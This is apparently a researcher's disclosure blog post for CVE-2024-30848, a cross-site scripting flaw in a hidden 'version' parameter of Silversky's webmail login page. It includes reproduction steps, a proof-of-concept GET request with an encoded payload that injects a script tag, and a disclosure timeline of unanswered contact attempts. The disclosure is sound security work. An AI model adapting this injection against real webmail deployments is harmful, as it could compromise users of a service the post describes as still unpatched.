CVE-2024-30848: An XSS Vulnerability in Silversky's Mailing Service
As security researchers, we often stumble upon vulnerabilities that have the potential to compromise systems and expose sensitive information. One such discovery is the Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-30848, in Silversky’s mailing protection service. This blog post details the discovery process, the vulnerability itself, and the disclosure timeline.
Introduction
Cross-Site Scripting (XSS) vulnerabilities are a common yet dangerous threat to web applications, allowing attackers to inject malicious scripts into web pages viewed by other users. On March 17, 2024, I discovered an XSS vulnerability in a hidden parameter named version within Silversky’s mailing protection service. Despite multiple attempts to contact Silversky for remediation, the company has not responded.
The Discovery
The journey to uncovering CVE-2024-30848 began quite unexpectedly. I got a message from my bug bounty framework that it had found an XSS. While reviewing the findings, I noticed that a particular program was using an external webmail service where the XSS was popping. Intrigued by this, I delved deeper into the service, which led me to discover that the service they were using was provided by Silversky. During this examination, I identified a hidden parameter named version that appeared to be vulnerable to XSS attacks.
Technical Details
Silversky mailing service is a webmail service that they provide to various customers. However, the hidden version parameter within its web interface was susceptible to XSS. By exploiting this vulnerability, an attacker could inject malicious scripts into the webpage, potentially compromising the security of the users interacting with the service.
Steps to Reproduce the Vulnerability
- Access the Silversky mailing protection service web interface.
- Locate the hidden version parameter in the HTTP request.
- Inject a malicious script into the version parameter.
- Observe the execution of the script when the webpage is loaded, confirming the XSS vulnerability.
PoC
1
2
3
4
5
6
7
8
9
10
11
12
13
GET /tpl/Door/Login?Domain=&version=1--%3E%3Cbody%3E%3Ch1%3EPoC%20by%20Excis3%3C/h1%3E%3Cscript%3Eprint(%271%27)%3C/script%3E%3C/body%3E%3C/html%3E%3C!-- HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
Te: trailers
Connection: keep-alive
Disclosure Timeline
The following timeline outlines the attempts made to disclose this vulnerability to Silversky:
- March 17, 2024: Vulnerability discovered.
- March 18, 2024: Initial disclosure email sent to supportdb@silversky.com.
- March 18, 2024: MITRE CVE request.
- March 22, 2024: Follow-up email sent to supportdb@silversky.com.
- March 22, 2024: Email sent to Jackson, the CTO, at jackson@silversky.com.
- March 22, 2024: Reached out to Silversky via Twitter (@silversky).
- March 22, 2024: Attempted to connect with relevant personnel on LinkedIn.
- April 04, 2024: MITRE Reserved CVE-2024-30848
- May 7, 2024: Final email sent to supportdb@silversky.com.
- June 18, 2024: Disclosed issue.
Despite these efforts, no response was received from Silversky regarding the reported vulnerability.
Conclusion
CVE-2024-30848 highlights the importance of timely and effective communication between security researchers and software providers. While discovering vulnerabilities is crucial, addressing them promptly is equally important to safeguard users. As security researchers, our goal is to enhance the safety and security of digital systems. Publicly disclosing this vulnerability after the 90-day grace period is a step towards urging Silversky to take action and protect its users from potential XSS attacks. We hope this disclosure will lead to the necessary remediation and raise awareness about the significance of addressing security vulnerabilities.
Stay safe and secure,
Excis3